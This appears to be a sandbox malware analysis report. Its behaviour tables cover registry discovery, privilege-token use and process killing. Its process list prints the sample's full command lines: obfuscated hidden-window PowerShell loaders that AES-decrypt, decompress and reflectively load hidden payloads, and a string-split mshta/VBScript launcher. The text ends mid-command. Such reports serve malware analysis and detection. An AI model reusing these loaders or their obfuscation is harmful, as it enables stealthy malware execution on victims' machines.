System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{60413543-b28d-43e9-94ce-14cde01c7a56}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{12bfecfc-bdd5-4ae4-a983-2e067fa08bc0}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 
-join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join 